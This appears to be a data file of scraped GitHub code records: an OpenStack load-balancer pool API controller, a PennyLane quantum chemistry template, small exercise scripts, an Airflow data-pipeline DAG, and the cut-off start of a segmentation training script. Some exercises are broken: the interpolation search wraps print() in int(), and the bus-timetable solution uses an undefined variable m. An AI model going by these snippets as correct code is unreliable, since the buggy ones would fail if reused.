expose as pecan_expose\nfrom pecan import request as pecan_request\nfrom wsme import types as wtypes\nfrom wsmeext import pecan as wsme_pecan\n\nfrom octavia_proxy.api.common.invocation import driver_invocation\nfrom octavia_proxy.api.drivers import driver_factory\nfrom octavia_proxy.api.drivers import utils as driver_utils\nfrom octavia_proxy.api.v2.controllers import base, member, health_monitor\nfrom octavia_proxy.api.v2.types import pool as pool_types\nfrom octavia_proxy.api.common import types\nfrom octavia_proxy.common import constants, validate, exceptions\nfrom octavia_proxy.i18n import _\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\n\nclass PoolsController(base.BaseController):\n RBAC_TYPE = constants.RBAC_POOL\n\n def __init__(self):\n super().__init__()\n\n @wsme_pecan.wsexpose(pool_types.PoolRootResponse, wtypes.text,\n [wtypes.text], ignore_extra_args=True)\n def get_one(self, id, fields=None):\n \"\"\"Gets a pool's details.\"\"\"\n pcontext = pecan_request.context\n context = pecan_request.context.get('octavia_context')\n query_params = pcontext.get(constants.PAGINATION_HELPER).params\n is_parallel = query_params.pop('is_parallel', True)\n\n pool = self.find_pool(context, id, is_parallel)[0]\n self._auth_validate_action(context, pool.project_id,\n constants.RBAC_GET_ONE)\n\n if fields is not None:\n pool = self._filter_fields([pool], fields)[0]\n return pool_types.PoolRootResponse(pool=pool)\n\n @wsme_pecan.wsexpose(pool_types.PoolsRootResponse, wtypes.text,\n [wtypes.text], ignore_extra_args=True)\n def get_all(self, project_id=None, fields=None):\n \"\"\"Lists all pools.\"\"\"\n pcontext = pecan_request.context\n context = pcontext.get('octavia_context')\n\n query_filter = self._auth_get_all(context, project_id)\n pagination_helper = pcontext.get(constants.PAGINATION_HELPER)\n\n query_params = pagination_helper.params\n query_filter.update(query_params)\n\n is_parallel = query_filter.pop('is_parallel', True)\n allow_pagination = CONF.api_settings.allow_pagination\n\n links = []\n result = driver_invocation(\n context, 'pools', is_parallel, query_filter\n )\n\n if allow_pagination:\n result_to_dict = [pl_obj.to_dict() for pl_obj in result]\n temp_result, temp_links = pagination_helper.apply(result_to_dict)\n links = [types.PageType(**link) for link in temp_links]\n result = self._convert_sdk_to_type(\n temp_result, pool_types.PoolFullResponse\n )\n\n if fields is not None:\n result = self._filter_fields(result, fields)\n return pool_types.PoolsRootResponse(\n pools=result, pools_links=links)\n\n @wsme_pecan.wsexpose(pool_types.PoolRootResponse,\n body=pool_types.PoolRootPOST, status_code=201)\n def post(self, pool_):\n \"\"\"Creates a pool on a load balancer or listener.\n\n Note that this can optionally take a listener_id with which the pool\n should be associated as the listener's default_pool. If specified,\n the pool creation will fail if the listener specified already has\n a default_pool.\n \"\"\"\n\n pool = pool_.pool\n context = pecan_request.context.get('octavia_context')\n listener = None\n loadbalancer = None\n\n if not pool.project_id and context.project_id:\n pool.project_id = context.project_id\n\n self._auth_validate_action(\n context, pool.project_id, constants.RBAC_POST)\n if pool.loadbalancer_id:\n loadbalancer = self.find_load_balancer(\n context, pool.loadbalancer_id)[0]\n pool.loadbalancer_id = loadbalancer.id\n elif pool.listener_id:\n listener = self.find_listener(context, pool.listener_id)[0]\n loadbalancer = self.find_load_balancer(\n context, listener.loadbalancers[0].id)[0]\n pool.loadbalancer_id = listener.loadbalancers[0].id\n else:\n msg = _(\"Must provide at least one of: \"\n \"loadbalancer_id, listener_id\")\n raise exceptions.ValidationException(detail=msg)\n\n if pool.listener_id and listener:\n self._validate_protocol(listener.protocol, pool.protocol)\n\n if pool.protocol in constants.PROTOCOL_UDP:\n self._validate_pool_request_for_tcp_udp(pool)\n\n if pool.session_persistence:\n sp_dict = pool.session_persistence.to_dict(render_unsets=False)\n validate.check_session_persistence(sp_dict)\n\n driver = driver_factory.get_driver(loadbalancer.provider)\n\n pool_dict = pool.to_dict(render_unsets=False)\n pool_dict['id'] = None\n\n if listener and listener.default_pool_id:\n raise exceptions.DuplicatePoolEntry()\n\n result = driver_utils.call_provider(\n driver.name, driver.pool_create,\n context.session,\n pool)\n\n return pool_types.PoolRootResponse(pool=result)\n\n @wsme_pecan.wsexpose(pool_types.PoolRootResponse, wtypes.text,\n body=pool_types.PoolRootPut, status_code=200)\n def put(self, id, pool_):\n \"\"\"Updates a pool on a load balancer.\"\"\"\n pool = pool_.pool\n context = pecan_request.context.get('octavia_context')\n\n orig_pool = self.find_pool(context, id)[0]\n\n self._auth_validate_action(\n context, orig_pool.project_id,\n constants.RBAC_PUT)\n\n # Load the driver early as it also provides validation\n driver = driver_factory.get_driver(orig_pool.provider)\n\n # Prepare the data for the driver data model\n pool_dict = pool.to_dict(render_unsets=False)\n\n result = driver_utils.call_provider(\n driver.name, driver.pool_update,\n context.session,\n orig_pool, pool_dict)\n\n return pool_types.PoolRootResponse(pool=result)\n\n @wsme_pecan.wsexpose(None, wtypes.text, status_code=204)\n def delete(self, id):\n \"\"\"Deletes a pool from a load balancer.\"\"\"\n context = pecan_request.context.get('octavia_context')\n\n pool = self.find_pool(context, id)[0]\n\n self._auth_validate_action(\n context, pool.project_id,\n constants.RBAC_DELETE)\n\n if pool.healthmonitor_id:\n raise exceptions.PoolInUseByHealthCheck(\n id=pool.id, healthmonitor_id=pool.healthmonitor_id)\n\n # Load the driver early as it also provides validation\n driver = driver_factory.get_driver(pool.provider)\n\n driver_utils.call_provider(\n driver.name, driver.pool_delete,\n context.session,\n pool)\n\n @pecan_expose()\n def _lookup(self, pool_id, *remainder):\n \"\"\"Overridden pecan _lookup method for custom routing.\n\n Verifies that the pool passed in the url exists, and if so decides\n which controller, if any, should control be passed.\n \"\"\"\n context = pecan_request.context.get('octavia_context')\n if pool_id and remainder and remainder[0] == 'members':\n remainder = remainder[1:]\n pool = self.find_pool(context, pool_id)[0]\n if not pool:\n LOG.info(\"Pool %s not found.\", pool_id)\n raise exceptions.NotFound(\n resource='pool',\n id=pool_id)\n if remainder:\n return member.MemberController(pool_id=pool.id), remainder\n return member.MembersController(pool_id=pool.id), remainder\n return None\n\n def _graph_create(self, session, lb, pool, hm=None, members=None,\n provider=None):\n if not hm:\n hm = pool.healthmonitor\n if not members:\n members = pool.members\n\n driver = driver_factory.get_driver(provider)\n\n if pool.protocol in constants.PROTOCOL_UDP:\n self._validate_pool_request_for_tcp_udp(pool)\n\n if pool.session_persistence:\n sp_dict = pool.session_persistence.to_dict(render_unsets=False)\n validate.check_session_persistence(sp_dict)\n\n result_pool = driver_utils.call_provider(\n driver.name, driver.pool_create,\n session, pool)\n if not result_pool:\n context = pecan_request.context.get('octavia_context')\n driver_utils.call_provider(\n driver.name, driver.loadbalancer_delete,\n context.session,\n lb, cascade=True)\n raise Exception('Pool {pool} creation failed'.format(\n pool=pool.name))\n\n new_hm = None\n if hm:\n if not hm.delay or not hm.type:\n raise exceptions.ValidationException(\n detail=\"Mandatory parameter is missing for healthmonitor.\")\n\n if result_pool.protocol in (constants.PROTOCOL_UDP):\n health_monitor.HealthMonitorController(\n )._validate_healthmonitor_request_for_udp(\n hm, result_pool.protocol)\n else:\n if hm.type in (constants.HEALTH_MONITOR_UDP_CONNECT):\n raise exceptions.ValidationException(detail=_(\n \"The %(type)s type is only supported for pools of \"\n \"type %(protocol)s.\") % {\n 'type': hm.type,\n 'protocol': '/'.join((constants.PROTOCOL_UDP))})\n\n hm_post = hm.to_hm_post(pool_id=result_pool.id,\n project_id=result_pool.project_id)\n new_hm = health_monitor.HealthMonitorController()._graph_create(\n session, lb=lb, hm_dict=hm_post, provider=result_pool.provider)\n\n # Now create members\n new_members = []\n if members:\n for m in members:\n member_post = m.to_member_post(\n project_id=result_pool.project_id)\n new_member = member.MembersController(result_pool.id)\\\n ._graph_create(session, lb, member_post,\n provider=result_pool.provider)\n new_members.append(new_member)\n full_response_pool = result_pool.to_full_response(members=new_members,\n healthmonitor=new_hm)\n return full_response_pool\n","repo_name":"opentelekomcloud-infra/octavia-proxy","sub_path":"octavia_proxy/api/v2/controllers/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":10638,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"31504466222","text":"r\"\"\"\nContains the AllSinglesDoubles template.\n\"\"\"\n# pylint: disable-msg=too-many-branches,too-many-arguments,protected-access\nimport numpy as np\nimport pennylane as qml\nfrom pennylane.operation import Operation, AnyWires\nfrom pennylane.ops import BasisState\n\n\nclass AllSinglesDoubles(Operation):\n r\"\"\"Builds a quantum circuit to prepare correlated states of molecules\n by applying all :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations to\n the initial Hartree-Fock state.\n\n The template initializes the :math:`n`-qubit system to encode\n the input Hartree-Fock state and applies the particle-conserving\n :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations which are implemented as\n `Givens rotations <https://en.wikipedia.org/wiki/Givens_rotation>`_ that act\n on the subspace of two and four qubits, respectively. The total number of\n excitation gates and the indices of the qubits they act on are obtained\n using the :func:`~.excitations` function.\n\n For example, the quantum circuit for the case of two electrons and six qubits\n is sketched in the figure below:\n\n |\n\n .. figure:: ../../_static/templates/subroutines/all_singles_doubles.png\n :align: center\n :width: 70%\n :target: javascript:void(0);\n\n |\n\n In this case, we have four single and double excitations that preserve the total-spin\n projection of the Hartree-Fock state. The :class:`~.pennylane.SingleExcitation` gate\n :math:`G` act on the qubits ``[0, 2], [0, 4], [1, 3], [1, 5]`` as indicated by the\n squares, while the :class:`~.pennylane.DoubleExcitation` operation :math:`G^{(2)}` is\n applied to the qubits ``[0, 1, 2, 3], [0, 1, 2, 5], [0, 1, 2, 4], [0, 1, 4, 5]``.\n\n The resulting unitary conserves the number of particles and prepares the\n :math:`n`-qubit system in a superposition of the initial Hartree-Fock state and\n other states encoding multiply-excited configurations.\n\n Args:\n weights (tensor_like): size ``(len(singles) + len(doubles),)`` tensor containing the\n angles entering the :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations, in that order\n wires (Iterable): wires that the template acts on\n hf_state (array[int]): Length ``len(wires)`` occupation-number vector representing the\n Hartree-Fock state. ``hf_state`` is used to initialize the wires.\n singles (Sequence[Sequence]): sequence of lists with the indices of the two qubits\n the :class:`~.pennylane.SingleExcitation` operations act on\n doubles (Sequence[Sequence]): sequence of lists with the indices of the four qubits\n the :class:`~.pennylane.DoubleExcitation` operations act on\n\n .. details::\n :title: Usage Details\n\n Notice that:\n\n #. The number of wires has to be equal to the number of spin orbitals included in\n the active space.\n\n #. The single and double excitations can be generated with the function\n :func:`~.excitations`. See example below.\n\n An example of how to use this template is shown below:\n\n .. code-block:: python\n\n import pennylane as qml\n import numpy as np\n\n electrons = 2\n qubits = 4\n\n # Define the HF state\n hf_state = qml.qchem.hf_state(electrons, qubits)\n\n # Generate all single and double excitations\n singles, doubles = qml.qchem.excitations(electrons, qubits)\n\n # Define the device\n dev = qml.device('default.qubit', wires=qubits)\n\n wires = range(qubits)\n\n @qml.qnode(dev)\n def circuit(weights, hf_state, singles, doubles):\n qml.templates.AllSinglesDoubles(weights, wires, hf_state, singles, doubles)\n return qml.expval(qml.PauliZ(0))\n\n # Evaluate the QNode for a given set of parameters\n params = np.random.normal(0, np.pi, len(singles) + len(doubles))\n circuit(params, hf_state, singles=singles, doubles=doubles)\n \"\"\"\n\n num_wires = AnyWires\n grad_method = None\n\n def __init__(self, weights, wires, hf_state, singles=None, doubles=None, id=None):\n if len(wires) < 2:\n raise ValueError(\n f\"The number of qubits (wires) can not be less than 2; got len(wires) = {len(wires)}\"\n )\n\n if doubles is not None:\n for d_wires in doubles:\n if len(d_wires) != 4:\n raise ValueError(\n f\"Expected entries of 'doubles' to be of size 4; got {d_wires} of length {len(d_wires)}\"\n )\n\n if singles is not None:\n for s_wires in singles:\n if len(s_wires) != 2:\n raise ValueError(\n f\"Expected entries of 'singles' to be of size 2; got {s_wires} of length {len(s_wires)}\"\n )\n\n weights_shape = qml.math.shape(weights)\n exp_shape = self.shape(singles, doubles)\n if weights_shape != exp_shape:\n raise ValueError(f\"'weights' tensor must be of shape {exp_shape}; got {weights_shape}.\")\n\n self._hyperparameters = {\n \"hf_state\": qml.math.toarray(hf_state),\n \"singles\": singles,\n \"doubles\": doubles,\n }\n\n if hf_state.dtype != np.dtype(\"int\"):\n raise ValueError(f\"Elements of 'hf_state' must be integers; got {hf_state.dtype}\")\n\n super().__init__(weights, wires=wires, id=id)\n\n @property\n def num_params(self):\n return 1\n\n @staticmethod\n def compute_decomposition(\n weights, wires, hf_state, singles, doubles\n ): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a product of other operators.\n\n .. math:: O = O_1 O_2 \\dots O_n.\n\n\n\n .. seealso:: :meth:`~.AllSinglesDoubles.decomposition`.\n\n Args:\n weights (tensor_like): size ``(len(singles) + len(doubles),)`` tensor containing the\n angles entering the :class:`~.pennylane.SingleExcitation` and\n :class:`~.pennylane.DoubleExcitation` operations, in that order\n wires (Any or Iterable[Any]): wires that the operator acts on\n hf_state (array[int]): Length ``len(wires)`` occupation-number vector representing the\n Hartree-Fock state. ``hf_state`` is used to initialize the wires.\n singles (Sequence[Sequence]): sequence of lists with the indices of the two qubits\n the :class:`~.pennylane.SingleExcitation` operations act on\n doubles (Sequence[Sequence]): sequence of lists with the indices of the four qubits\n the :class:`~.pennylane.DoubleExcitation` operations act on\n\n Returns:\n list[.Operator]: decomposition of the operator\n \"\"\"\n op_list = []\n\n op_list.append(BasisState(hf_state, wires=wires))\n\n for i, d_wires in enumerate(doubles):\n op_list.append(qml.DoubleExcitation(weights[len(singles) + i], wires=d_wires))\n\n for j, s_wires in enumerate(singles):\n op_list.append(qml.SingleExcitation(weights[j], wires=s_wires))\n\n return op_list\n\n @staticmethod\n def shape(singles, doubles):\n r\"\"\"Returns the expected shape of the tensor that contains the circuit parameters.\n\n Args:\n singles (Sequence[Sequence]): sequence of lists with the indices of the two qubits\n the :class:`~.pennylane.SingleExcitation` operations act on\n doubles (Sequence[Sequence]): sequence of lists with the indices of the four qubits\n the :class:`~.pennylane.DoubleExcitation` operations act on\n\n Returns:\n tuple(int): shape of the tensor containing the circuit parameters\n \"\"\"\n if singles is None or not singles:\n if doubles is None or not doubles:\n raise ValueError(\n f\"'singles' and 'doubles' lists can not be both empty;\"\n f\" got singles = {singles}, doubles = {doubles}\"\n )\n if doubles is not None:\n shape_ = (len(doubles),)\n elif doubles is None:\n shape_ = (len(singles),)\n else:\n shape_ = (len(singles) + len(doubles),)\n\n return shape_\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/templates/subroutines/all_singles_doubles.py","file_name":"all_singles_doubles.py","file_ext":"py","file_size_in_byte":8482,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"17435986802","text":"''' Module for handling I/O in debug mode. '''\nimport logger\n\ndef _to_int(curr_str):\n '''Tries to turn a string to int, returns -1 if not possible'''\n try:\n return int(curr_str)\n except ValueError:\n return -1\n\n\ndef get_player_cnt():\n ''' Console prompts for number of players. '''\n return int(input('Enter number of players: '))\n\n\ndef get_names(player_cnt):\n ''' Console prompts for player names. '''\n print('Please enter your names in a circular, clockwise order.')\n names = []\n for i in range(player_cnt):\n curr_name = input('Enter player ' + str(i + 1) + ' name: ')\n while curr_name == '':\n curr_name = input('Enter player ' + str(i + 1) + ' name: ')\n\n names.append(curr_name)\n\n return names\n\n\ndef get_bid(name, possible_bids):\n ''' Console prompts for a valid bid. '''\n bid = _to_int(input('Enter ' + name + '\\'s bid from ' + str(possible_bids) + ': '))\n while bid not in possible_bids:\n bid = _to_int(input('Invalid bid, again: '))\n\n return bid\n\n\ndef get_result(name, possible_results):\n ''' Console prompts for a valid bid. '''\n result = _to_int(input('Enter ' + name + '\\'s result from ' + str(possible_results) + ': '))\n while result not in possible_results:\n result = _to_int(input('Invalid result, again: '))\n\n return result\n\n\ndef show_scoreboard(player_names, target_round, scoreboard):\n ''' Prints scoreboard in console. '''\n logger.log_info('\\nScoreboard - Round ' + str(target_round + 1))\n logger.log_info(player_names)\n\n if target_round > 0:\n logger.log_info('Previous: ' + str(scoreboard[target_round - 1]))\n logger.log_info('New: ' + str(scoreboard[target_round]))\n","repo_name":"cluntraru/GameMaster","sub_path":"src/whist_api/io_api/debug_io.py","file_name":"debug_io.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20398747415","text":"def get_absolute_time(string):\n hour = int(string[:2])\n minute = int(string[-2:])\n return hour * 60 + minute\n\n\ndef get_time(integer):\n hour = str(integer // 60)\n minute = str(integer % 60)\n if len(hour) == 1 and len(minute) == 1:\n return \"0%s:0%s\" % (hour, minute)\n if len(minute) == 1:\n return \"%s:0%s\" % (hour, minute)\n if len(hour) == 1:\n return \"0%s:%s\" % (hour, minute)\n return \"%s:%s\" % (hour, minute)\n\n\ndef get_bus_timetable(number, time):\n start = get_absolute_time(\"09:00\")\n bus_timetable = []\n for i in range(number):\n bus_timetable.append(start + i * time)\n return bus_timetable\n\n\ndef solution(n, t, timetable):\n absolute_time = []\n for time in timetable:\n absolute_time.append(get_absolute_time(time))\n\n absolute_time.sort()\n bus_timetable = get_bus_timetable(n, t)\n buses = [[] for _ in range(len(bus_timetable))]\n\n for i in range(len(bus_timetable)):\n while absolute_time:\n if len(buses[i]) <= m:\n if absolute_time[0] <= bus_timetable[i]:\n buses[i].append(absolute_time.pop(0))\n else:\n break\n else:\n break\n\n result = None\n if len(buses[-1]) < m:\n result = bus_timetable[-1]\n elif len(buses[-1]) == m:\n for j in range(len(buses[-1])-1, 0, -1):\n if buses[-1][j] != buses[-1][j-1]:\n result = buses[-1][j] - 1\n break\n else:\n result = buses[-1][0] - 1\n\n return get_time(result)\n\n","repo_name":"KhelKim/CodingPractice","sub_path":"Programmers/simulation/17678.py","file_name":"17678.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9509901707","text":"# 4-8\n\nimport random\n\ndef interpolation_search(data,val):\n low=0\n high=49\n print('We Are Searching...')\n while low<= high and val !=-1:\n mid=low+int((val-data[low])*(high-low)/(data[high]-data[low]))\n if val==data[mid]:\n return mid\n elif val< data[mid]:\n print('%d is between %d[%3d] and the midian %d[%3d], look for the left' %(val,low+1,data[low],mid+1,data[mid]))\n high=mid-1\n elif val>data[mid]:\n print('%d is between %d[%3d] and the midian %d[%3d], look for the right' %(val,mid+1,data[mid],high+1,data[high]))\n low=mid+1\n return -1\n\nval=1\ndata=[0]*50\nfor i in range(50):\n data[i]=val\n val=val+random.randint(1,5)\n \nwhile True:\n num=0\n val=int(print('Please insert the value(1-150), insert-1 to exit: '))\n if val==-1:\n break\n num=interpolation_search(data,val)\n if num==-1:\n print('##### Sorry!We didn\\'t find [%3d] #####' %val) \n else:\n print('Found [%3d] in index %2d' %(data[num],num+1))\nprint('The content of the data:')\nfor i in range(5):\n for j in range(10):\n print('%3d-%-3d' %(i*10+j+1,data[i*10+j]),end='')\n print()","repo_name":"YiruDing/Daily-Coding-Practice-Py","sub_path":"Python_algo/Search/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41299369454","text":"import datetime\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.providers.mysql.operators.mysql import MySqlOperator\nfrom airflow.utils.dates import days_ago\nfrom airflow.operators.email_operator import EmailOperator\nfrom airflow.utils.email import send_email\n\n\nimport sys\nsys.path.append('/opt/airflow/scripts')\nsys.path.append('/opt/airflow/plugins/operators')\nfrom data_quality import PostgresDataQualityOperator\nimport sql_queries\n\n\ndef failure_function(context):\n dag_run = context.get('dag_run')\n msg = \"\"\" <h1> Test email notification </h1> \n The folder you are trying to open doesn't exist hence the task has Failed.\"\"\"\n subject = f\"DAG {dag_run} Failed\"\n send_email(to='benzativit@gmail.com', subject=subject, html_content=msg)\n\ndef success_function(context):\n dag_run = context.get('dag_run')\n msg = \"All task has executed successfully.\"\n subject = f\"DAG {dag_run} has completed\"\n send_email(to='benzativit@gmail.com', subject=subject, html_content=msg)\n\n\ndefault_args = {\n 'owner' : 'airflow',\n 'retries' : 1,\n 'retry_delay' : datetime.timedelta(minutes=3),\n}\n\ndag = DAG(\n 'hands_on_test',\n default_args = default_args,\n description = 'Data Pipeline',\n start_date = days_ago(1),\n schedule_interval = '@daily'\n)\n\nstart = DummyOperator(\n task_id = 'start',\n dag = dag\n)\n\n# conn_mysql = DummyOperator(\n# task_id = 'Conn_mysql_db',\n# dag = dag\n# )\n\n# drop_order = MySqlOperator(\n# task_id = 'drop_order_table',\n# dag = dag,\n# mysql_conn_id = 'mysql_db',\n# sql = sql_queries.drop_order_table,\n# autocommit = True\n# )\n\n# create_order = MySqlOperator(\n# task_id = 'create_order',\n# dag = dag,\n# mysql_conn_id = 'mysql_db',\n# sql = sql_queries.create_order_table,\n# autocommit = True\n# )\n\n# copy_order_data = MySqlOperator(\n# task_id = 'copy_order_data',\n# dag = dag,\n# mysql_conn_id = 'mysql_db', \n# sql = sql_queries.copy_order_data,\n# autocommit = True\n# )\n\nconn_postgres_db = DummyOperator(\n task_id = 'Conn_postgres_db',\n dag = dag\n)\n\n\ndrop_order_detail = PostgresOperator(\n task_id = 'drop_order_detail_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.drop_order_detail_table,\n autocommit = True\n)\n\ncreate_order_detail = PostgresOperator(\n task_id = 'create_order_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.create_order_detail_table,\n autocommit = True\n)\n\ncopy_order_detail_data = PostgresOperator(\n task_id = 'copy_order_detail_data',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.copy_order_detail_data,\n autocommit = True\n)\n\ndrop_restaurant_detail = PostgresOperator(\n task_id = 'drop_restaurant_detail_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.drop_restaurant_detail_table,\n autocommit = True\n)\n\ncreate_restaurant_detail = PostgresOperator(\n task_id = 'create_restaurant_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.create_restaurant_detail_table,\n autocommit = True\n)\n\ncopy_restaurant_detail_data = PostgresOperator(\n task_id = 'copy_restaurant_detail_data',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n sql = sql_queries.copy_restaurant_detail_data,\n autocommit = True\n)\n\npostgres_data_quality_check = PostgresDataQualityOperator(\n task_id = 'postgreq_data_quality_check',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n postgres_conn_id = 'postgres_db',\n data_quality_checks = sql_queries.postgres_data_quality_check\n)\n\ninstall_sqoop = BashOperator(\n task_id = 'install_sqoop',\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server bash /opt/sqoop/install_sqoop.sh ',\n dag = dag\n)\n\nimport_sqoop = BashOperator(\n task_id = 'import_sqoop',\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server bash /opt/sqoop/import_sqoop.sh ',\n dag = dag\n)\n\nspark_transform_order_table = BashOperator(\n task_id = 'spark_transform_order_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_transform_order_table /home/script/transform_order_table.py '\n)\n\nspark_transform_restaurant_table = BashOperator(\n task_id = 'spark_transform_restaurant_table',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_transform_restaurant_table /home/script/transform_restaurant_table.py '\n)\n\ncreate_hive_order_detail = BashOperator(\n task_id = 'create_hive_order_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/order_detail.hql '\n)\n\ncreate_hive_restaurant_detail = BashOperator(\n task_id = 'create_hive_restaurant_detail',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/restaurant_detail.hql '\n)\n\nspark_create_order_detail_new = BashOperator(\n task_id = 'spark_create_order_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_create_order_detail_new /home/script/create_order_detail_new.py '\n)\n\nspark_create_restaurant_detail_new = BashOperator(\n task_id = 'spark_create_restaurant_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_create_restaurant_detail_new /home/script/create_restaurant_detail_new.py '\n)\n\ncreate_hive_order_detail_new = BashOperator(\n task_id = 'create_hive_order_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/order_detail_new.hql '\n)\n\ncreate_hive_restaurant_detail_new = BashOperator(\n task_id = 'create_hive_restaurant_detail_new',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec hive-server hive -f /opt/hql/restaurant_detail_new.hql '\n)\n\ngenerate_sql_requirement = BashOperator(\n task_id = 'generate_sql_requirement',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_create_restaurant_detail_new /home/script/sql_requirement.py '\n)\n\nspark_data_quality_check = BashOperator(\n task_id = 'spark_data_quality_check',\n dag = dag,\n on_failure_callback=failure_function,\n # on_success_callback=success_function,\n bash_command = 'docker exec spark-master /spark/bin/spark-submit --master local[*] --name spark_data_quality_check /home/script/dq_check.py '\n)\n\nend = DummyOperator(\n task_id = 'end',\n # on_failure_callback=failure_function,\n on_success_callback=success_function,\n dag = dag\n)\n\ntest_task_fail = DummyOperator(\n task_id = 'fail',\n on_failure_callback=failure_function,\n on_success_callback=success_function,\n dag = dag\n)\n\nopen_temp_folder = BashOperator(\n task_id='open_temp_folder',\n on_failure_callback=failure_function,\n on_success_callback=success_function,\n bash_command='cd temp_folder'\n )\n\n\nstart >> conn_postgres_db >> drop_order_detail >> create_order_detail >> copy_order_detail_data >> postgres_data_quality_check\nstart >> conn_postgres_db >> drop_restaurant_detail >> create_restaurant_detail >> copy_restaurant_detail_data >> postgres_data_quality_check\n# start >> conn_mysql >> drop_order >> create_order \npostgres_data_quality_check >> install_sqoop >> import_sqoop >> [ spark_transform_order_table, spark_transform_restaurant_table]\n\nspark_transform_order_table >> spark_create_order_detail_new >> spark_data_quality_check >> [create_hive_order_detail , create_hive_order_detail_new]\nspark_transform_restaurant_table >> spark_create_restaurant_detail_new >> spark_data_quality_check >> [create_hive_restaurant_detail , create_hive_restaurant_detail_new]\n[create_hive_order_detail, create_hive_restaurant_detail, create_hive_order_detail_new, create_hive_restaurant_detail_new] >> generate_sql_requirement >> end >> test_task_fail >> open_temp_folder\n\n","repo_name":"ativitbenz/Airflow","sub_path":"airflow/dags/dag.py","file_name":"dag.py","file_ext":"py","file_size_in_byte":9583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35872456031","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\n\nimport torchvision.utils\n\nfrom logger import setup_logger\n\nfrom models.model_stages import BiSeNet\n\nfrom cityscapes import CityScapes\nfrom loss.loss import OhemCELoss\nfrom loss.detail_loss import DetailAggregateLoss\nfrom evaluation import MscEvalV0\nfrom optimizer_loss import Optimizer\nfrom torchvision import transforms\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n# import torch.distributed as dist\nfrom PIL import Image\nimport os\nimport os.path as osp\nimport logging\nimport time\nimport datetime\nimport argparse\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nlogger = logging.getLogger()\nCUDA_ID = 3\ntorch.cuda.set_device(CUDA_ID)\n# summary = SummaryWriter(\"logs/board\"),\npatch_size = 40\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Unsupported value encountered.')\n\n\n# --pretrain_path\ndef parse_args():\n parse = argparse.ArgumentParser()\n parse.add_argument(\n '--local_rank',\n dest='local_rank',\n type=int,\n default=-1,\n )\n parse.add_argument(\n '--n_workers_train',\n dest='n_workers_train',\n type=int,\n default=12,\n )\n parse.add_argument(\n '--n_workers_val',\n dest='n_workers_val',\n type=int,\n default=1,\n )\n # batch size\n parse.add_argument(\n '--n_img_per_gpu',\n dest='n_img_per_gpu',\n type=int,\n default=8,\n )\n # 最大迭代次数\n parse.add_argument(\n '--max_iter',\n dest='max_iter',\n type=int,\n default=150000,\n )\n # 保存频率\n parse.add_argument(\n '--save_iter_sep',\n dest='save_iter_sep',\n type=int,\n default=1000,\n )\n parse.add_argument(\n 